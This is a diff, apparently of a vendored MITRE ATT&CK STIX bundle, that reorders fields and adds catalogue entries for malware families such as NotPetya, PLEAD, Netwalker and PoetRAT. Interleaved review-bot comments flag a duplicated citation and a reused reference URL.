"id": "malware--53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2",
@@ -196802,13 +225928,13 @@
],
"modified": "2020-03-30T17:07:46.499Z",
"created": "2017-05-31T21:32:27.787Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NETEAGLE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2a70812b-f1ef-44db-8578-a496a227aef2",
@@ -196850,13 +225976,13 @@
],
"modified": "2020-03-30T17:09:00.491Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NETWIRE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -196893,13 +226019,13 @@
],
"modified": "2020-03-18T15:22:32.747Z",
"created": "2019-01-30T19:50:45.307Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"NOKKI"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
@@ -196960,9 +226086,9 @@
"description": "(Citation: Proofpoint Leviathan Oct 2017)"
},
{
- "source_name": "Proofpoint Leviathan Oct 2017",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
"description": "Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.",
- "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets"
+ "source_name": "Proofpoint Leviathan Oct 2017"
},
{
"url": "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf",
@@ -196977,15 +226103,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T17:09:48.180Z",
+ "modified": "2020-06-23T20:05:03.169Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NanHaiShu"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -197032,13 +226158,13 @@
],
"modified": "2020-03-30T17:10:28.673Z",
"created": "2019-01-29T20:05:35.952Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"NanoCore"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -197070,13 +226196,13 @@
],
"modified": "2020-03-20T01:52:50.303Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"NavRAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
@@ -197147,14 +226273,14 @@
],
"modified": "2020-03-30T17:11:08.175Z",
"created": "2017-05-31T21:32:38.851Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Net Crawler",
"NetC"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--cafd0bf8-2b9c-46c7-ae3c-3e0f42c5062e",
@@ -197182,10 +226308,44 @@
],
"modified": "2020-03-30T17:11:38.961Z",
"created": "2017-05-31T21:32:25.361Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NetTraveler"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0457",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0457"
+ },
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)",
+ "name": "Netwalker",
+ "id": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T16:14:19.924Z",
+ "created": "2020-05-26T21:02:38.186Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Netwalker"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -197216,29 +226376,50 @@
],
"modified": "2020-03-18T15:21:51.702Z",
"created": "2017-05-31T21:33:09.842Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Nidiran",
"Backdoor.Nidiran"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-03-26T15:02:14.907Z",
+ "modified": "2020-06-18T20:27:49.511Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
+ "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though [NotPetya](https://attack.mitre.org/software/S0368) presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)",
+ "name": "NotPetya",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0368",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0368"
},
+ {
+ "source_name": "ExPetr",
+ "description": "(Citation: ESET Telebots June 2017)"
+ },
+ {
+ "source_name": "Diskcoder.C",
+ "description": "(Citation: ESET Telebots June 2017)"
+ },
{
"source_name": "GoldenEye",
"description": "(Citation: Talos Nyetya June 2017)"
},
{
"source_name": "Petrwrap",
- "description": "(Citation: Talos Nyetya June 2017)"
+ "description": "(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)"
},
{
"source_name": "Nyetya",
@@ -197250,29 +226431,23 @@
"source_name": "Talos Nyetya June 2017"
},
{
- "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
+ "source_name": "US-CERT NotPetya 2017",
"url": "https://www.us-cert.gov/ncas/alerts/TA17-181A",
- "source_name": "US-CERT NotPetya 2017"
+ "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "NotPetya",
- "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though [NotPetya](https://attack.mitre.org/software/S0368) presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)",
- "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-28T21:37:04.899Z",
- "created": "2019-03-26T15:02:14.907Z",
"x_mitre_platforms": [
"Windows"
],
"x_mitre_aliases": [
"NotPetya",
+ "ExPetr",
+ "Diskcoder.C",
"GoldenEye",
"Petrwrap",
"Nyetya"
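Review bot: The new `description` for the NotPetya object cites `(Citation: Talos Nyetya June 2017)` twice in a row before `(Citation: US-CERT NotPetya 2017)`; the removed line carried the same duplication, so the regeneration preserves rather than fixes it. Since this file looks like a vendored copy of the upstream STIX bundle, the correction belongs in the upstream source, but it is worth flagging so anyone rendering citations from this field does not emit a duplicate reference. The object continues into the next hunk, where the `external_references` entry for that citation lives.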
@@ -197310,14 +226485,14 @@
],
"modified": "2020-03-19T23:51:58.976Z",
"created": "2017-05-31T21:33:18.946Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OLDBAIT",
"Sasfis"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f6d1d2cb-12f5-4221-9636-44606ea1f3f8",
@@ -197345,13 +226520,13 @@
],
"modified": "2020-03-18T22:53:32.172Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OSInfo"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -197402,16 +226577,23 @@
],
"modified": "2020-03-18T18:27:13.903Z",
"created": "2019-08-29T18:52:20.879Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"OSX/Shlayer",
"Crossrider"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
+ "id": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
+ "name": "OSX_OCEANLOTUS.D",
+ "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0352",
@@ -197428,18 +226610,11 @@
"source_name": "TrendMicro MacOS April 2018"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)",
- "name": "OSX_OCEANLOTUS.D",
- "id": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T17:12:14.783Z",
+ "modified": "2020-06-23T20:11:11.730Z",
"created": "2019-01-30T19:18:19.667Z",
"x_mitre_platforms": [
"macOS"
@@ -197479,13 +226654,13 @@
],
"modified": "2020-03-30T17:12:48.823Z",
"created": "2019-01-30T15:43:19.105Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OceanSalt"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -197517,13 +226692,50 @@
],
"modified": "2020-03-20T18:57:08.610Z",
"created": "2019-01-30T13:24:08.616Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Octopus"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0439",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0439"
+ },
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)",
+ "name": "Okrum",
+ "id": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-14T21:17:53.756Z",
+ "created": "2020-05-06T21:12:31.535Z",
+ "x_mitre_contributors": [
+ "ESET"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Okrum"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--3249e92a-870b-426d-8790-ba311c1abfb4",
@@ -197551,13 +226763,13 @@
],
"modified": "2020-03-25T17:57:57.273Z",
"created": "2019-03-25T14:07:22.547Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Olympic Destroyer"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--b136d088-a829-432c-ac26-5529c26d4c7e",
@@ -197585,13 +226797,13 @@
],
"modified": "2020-03-30T17:13:20.084Z",
"created": "2017-05-31T21:32:37.341Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OnionDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -197628,13 +226840,13 @@
],
"modified": "2020-03-30T02:36:44.945Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"OopsIE"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -197675,14 +226887,14 @@
],
"modified": "2020-03-30T17:13:56.470Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"Orz",
"AIRBREAK"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--a60657fa-e2e7-4f8f-8128-a882534ae8c5",
@@ -197710,13 +226922,13 @@
],
"modified": "2020-03-30T03:01:04.725Z",
"created": "2017-05-31T21:32:47.412Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OwaAuth"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--b2c5d3ca-b43a-4888-ad8d-e2d43497bf85",
@@ -197744,15 +226956,15 @@
],
"modified": "2020-03-30T17:14:31.945Z",
"created": "2017-05-31T21:32:16.715Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"P2P ZeuS",
"Peer-to-Peer ZeuS",
"Gameover ZeuS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f6ae7a52-f3b6-4525-9daf-640c083f006e",
@@ -197784,13 +226996,13 @@
],
"modified": "2020-03-30T17:15:03.862Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PHOREAL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b",
@@ -197822,12 +227034,68 @@
],
"modified": "2020-03-30T17:15:33.608Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PLAINTEE"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "name": "PLEAD",
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) ",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0435",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0435"
+ },
+ {
+ "source_name": "PLEAD",
+ "description": "PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)"
+ },
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "Trend Micro PLEAD RTLO",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/",
+ "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-04T01:44:16.182Z",
+ "created": "2020-05-06T12:55:10.969Z",
"x_mitre_platforms": [
"Windows"
+ ],
+ "x_mitre_aliases": [
+ "PLEAD"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Tatsuya Daitoku, Cyber Defense Institute, Inc."
]
},
{
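Review bot: In the added PLEAD object, the `JPCert PLEAD Downloader June 2018` reference and the `JPCert TSCookie March 2018` reference carry the identical `url` value (`.../2018/03/malware-tscooki-7aa0.html`), although their descriptions name two different articles dated June 8 and March 6, 2018. One of the two URLs is very likely wrong, which would make the PLEAD-downloader citation unverifiable for anyone following it. This is upstream ATT&CK data, so the fix belongs there, but it should be reported rather than silently carried along by the regeneration.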
@@ -197860,13 +227128,13 @@
],
"modified": "2020-03-30T17:16:18.343Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"POORAIM"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -197898,13 +227166,13 @@
],
"modified": "2020-03-30T17:16:53.396Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"POSHSPY"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--17e919aa-4a49-445c-b103-dbb8df9e7351",
@@ -197945,14 +227213,14 @@
],
"modified": "2020-03-30T17:17:35.369Z",
"created": "2017-05-31T21:33:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"POWERSOURCE",
"DNSMessenger"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
@@ -197996,16 +227264,16 @@
"labels": [
"malware"
],
- "modified": "2020-03-23T16:15:33.427Z",
+ "modified": "2020-06-23T20:16:28.982Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"POWERSTATS",
"Powermud"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -198033,13 +227301,13 @@
],
"modified": "2020-03-25T16:21:36.260Z",
"created": "2019-04-16T17:43:42.724Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"POWERTON"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46",
@@ -198069,20 +227337,27 @@
"labels": [
"malware"
],
- "modified": "2020-03-28T21:37:54.017Z",
+ "modified": "2020-07-06T16:11:56.562Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"POWRUNER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-06-25T22:31:02.691Z",
+ "labels": [
+ "malware"
],
+ "type": "malware",
+ "id": "malware--5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "PUNCHBUGGY",
+ "description": "[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -198103,9 +227378,9 @@
"description": "Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019."
},
{
- "source_name": "FireEye Fin8 May 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html",
"description": "Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html"
+ "source_name": "FireEye Fin8 May 2016"
},
{
"url": "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html",
@@ -198113,16 +227388,9 @@
"source_name": "FireEye Know Your Enemy FIN8 Aug 2016"
}
],
- "description": "[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)",
- "name": "PUNCHBUGGY",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "malware--5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
- "type": "malware",
- "labels": [
- "malware"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-30T02:40:51.738Z",
- "created": "2018-04-18T17:59:24.739Z",
"x_mitre_platforms": [
"Windows"
],
@@ -198171,14 +227439,14 @@
],
"modified": "2020-03-17T14:48:43.852Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PUNCHTRACK",
"PSVC"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e811ff6a-4cef-4856-a6ae-a7daf9ed39ae",
@@ -198215,13 +227483,13 @@
],
"modified": "2020-03-30T17:20:41.436Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Pasam"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--ae9d818d-95d0-41da-b045-9cabea1ca164",
@@ -198249,13 +227517,13 @@
],
"modified": "2020-03-30T17:21:09.930Z",
"created": "2017-05-31T21:32:35.780Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PinchDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--b96680d1-5eb3-4f07-b95c-00ab904ac236",
@@ -198287,13 +227555,13 @@
],
"modified": "2020-03-30T17:21:44.379Z",
"created": "2017-05-31T21:33:12.388Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Pisloader"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -198359,11 +227627,9 @@
"labels": [
"malware"
],
- "modified": "2020-03-27T21:54:12.551Z",
+ "modified": "2020-06-20T21:43:42.587Z",
"created": "2017-05-31T21:32:15.638Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"PlugX",
"DestroyRAT",
@@ -198371,7 +227637,43 @@
"Kaba",
"Korplug"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "created": "2020-04-27T20:21:16.487Z",
+ "modified": "2020-04-30T18:13:47.841Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "external_references": [
+ {
+ "external_id": "S0428",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0428"
+ },
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) is a Python-based remote access trojan (RAT) used in multiple campaigns against the private and public sectors in Azerbaijan, specifically ICS and SCADA systems in the energy sector. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare.(Citation: Talos PoetRAT April 2020) ",
+ "name": "PoetRAT",
+ "id": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "PoetRAT"
+ ]
},
{
"id": "malware--b42378e0-f147-496f-992a-26a49705395b",
@@ -198426,18 +227728,56 @@
],
"modified": "2020-03-25T13:56:40.675Z",
"created": "2017-05-31T21:32:15.263Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_contributors": [
+ "Darren Spruell"
+ ],
"x_mitre_aliases": [
"PoisonIvy",
"Poison Ivy",
"Darkmoon"
],
+ "x_mitre_version": "1.1"
